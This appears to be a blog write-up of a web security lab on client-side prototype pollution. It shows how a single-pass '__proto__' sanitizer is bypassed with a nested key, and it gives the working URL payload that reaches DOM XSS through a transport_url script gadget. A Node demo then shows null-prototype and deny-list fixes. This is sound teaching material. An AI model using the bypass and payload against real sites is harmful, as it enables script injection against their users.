29.3 Lab: Client-side prototype pollution via flawed sanitization
By Karthikeyan Nagaraj

Description

This lab is vulnerable to DOM XSS via client-side prototype pollution. Although the developers have implemented measures to prevent prototype pollution, these can be easily bypassed.

To solve the lab:
- Find a source that you can use to add arbitrary properties to the global `Object.prototype`.
- Identify a gadget property that allows you to execute arbitrary JavaScript.
- Combine these to call `alert()`.
Solution

- Using the prototype pollution source, try injecting an arbitrary `transport_url` property:

/?__pro__proto__to__[transport_url]=foo

The sanitization on this page removes the string `__proto__` from each key only once. Stripping the inner occurrence from `__pro__proto__to__` leaves `__proto__` behind, so the forbidden key reaches the query parser intact.
- In the browser DevTools panel, go to the Elements tab and study the HTML content of the page. Observe that a `<script>` element has been rendered on the page with the `src` attribute set to `foo`. This is the gadget: the page reads `transport_url` from a config object that never had it set, so the lookup falls through to the polluted `Object.prototype`.
- Modify the payload in the URL to inject an XSS proof-of-concept. For example, you can use a `data:` URL as follows:

/?__pro__proto__to__[transport_url]=data:,alert(1);

- Observe that `alert(1)` is called and the lab is solved.
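To make the bypass concrete, here is an added example (not the lab's own source and not the author's code) that re-creates the two behaviours the solution relies on: a query-string parser that turns `a[b]=c` into nested object writes, and a key sanitizer that strips forbidden tokens in a single pass. The same URL is then run through a null-prototype variant and a deny-rather-than-strip sanitizer to show two fixes. The names `sanitizeKeyFlawed`, `sanitizeKeyHardened`, `parseQuery`, `buildTransportScript` and `runDemo` are assumptions made for the demonstration.

```javascript
// Added example, not the lab's own source. Names and structure are assumptions
// chosen to mirror the behaviour described in the writeup, not the page's code.

const BAD_KEYS = ['constructor', '__proto__', 'prototype'];

// Flawed sanitizer: every forbidden token is removed exactly once. Deleting
// the inner "__proto__" from "__pro__proto__to__" leaves "__proto__" behind.
function sanitizeKeyFlawed(key) {
  for (const bad of BAD_KEYS) key = key.split(bad).join('');
  return key;
}

// Hardened sanitizer: deny instead of strip. A key containing a forbidden
// token anywhere is rejected outright, so no amount of nesting survives.
function sanitizeKeyHardened(key) {
  if (BAD_KEYS.some((bad) => key.includes(bad))) {
    throw new Error(`forbidden key: ${key}`);
  }
  return key;
}

// Parses "?a[b][c]=v" pairs into nested containers. `sanitize` runs on each
// path segment and `makeContainer` decides what kind of object holds values.
function parseQuery(search, { sanitize, makeContainer }) {
  const query = search.includes('?') ? search.slice(search.indexOf('?') + 1) : search;
  const params = makeContainer();
  for (const pair of query.split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const rawKey = eq === -1 ? pair : pair.slice(0, eq);
    const rawValue = eq === -1 ? '' : pair.slice(eq + 1);
    // "__proto__[transport_url]" -> ["__proto__", "transport_url"]
    const path = decodeURIComponent(rawKey).split(/[\[\]]+/).filter(Boolean).map(sanitize);
    if (path.length === 0) continue;
    let node = params;
    for (const seg of path.slice(0, -1)) {
      // On a plain {} the lookup of "__proto__" returns Object.prototype itself,
      // so the final write below lands on the global prototype.
      if (typeof node[seg] !== 'object' || node[seg] === null) node[seg] = makeContainer();
      node = node[seg];
    }
    node[path[path.length - 1]] = decodeURIComponent(rawValue);
  }
  return params;
}

// The gadget: page code reads config.transport_url from an object that never
// had it set, so the lookup falls through to Object.prototype.
function buildTransportScript(config) {
  if (!config.transport_url) return null;
  return `<script src="${config.transport_url}"></script>`;
}

// Runs one URL through three configurations and reports what the gadget
// would render in each case.
function runDemo(search) {
  const result = {};
  try {
    parseQuery(search, { sanitize: sanitizeKeyFlawed, makeContainer: () => ({}) });
    result.flawed = buildTransportScript({}); // fresh object, yet polluted
  } finally {
    delete Object.prototype.transport_url; // undo the pollution for the rest of the process
  }
  // Same weak sanitizer, but null-prototype containers: "__proto__" becomes an
  // ordinary own property and nothing reaches Object.prototype.
  parseQuery(search, { sanitize: sanitizeKeyFlawed, makeContainer: () => Object.create(null) });
  result.nullProto = buildTransportScript({});
  try {
    parseQuery(search, { sanitize: sanitizeKeyHardened, makeContainer: () => Object.create(null) });
    result.hardened = buildTransportScript({});
  } catch (e) {
    result.hardened = `rejected: ${e.message}`;
  }
  return result;
}

console.log(runDemo('/?__pro__proto__to__[transport_url]=data:,alert(1);'));
```

Run with Node: the flawed configuration yields a `<script>` whose `src` is the `data:` URL even though the config object passed to the gadget was empty; the null-prototype and deny-list variants yield no script at all. The null-prototype containers are a defence in depth: even if a sanitizer is bypassed, `__proto__` on an `Object.create(null)` object is just an own property.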
Thank you for Reading!
Happy Ethical Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng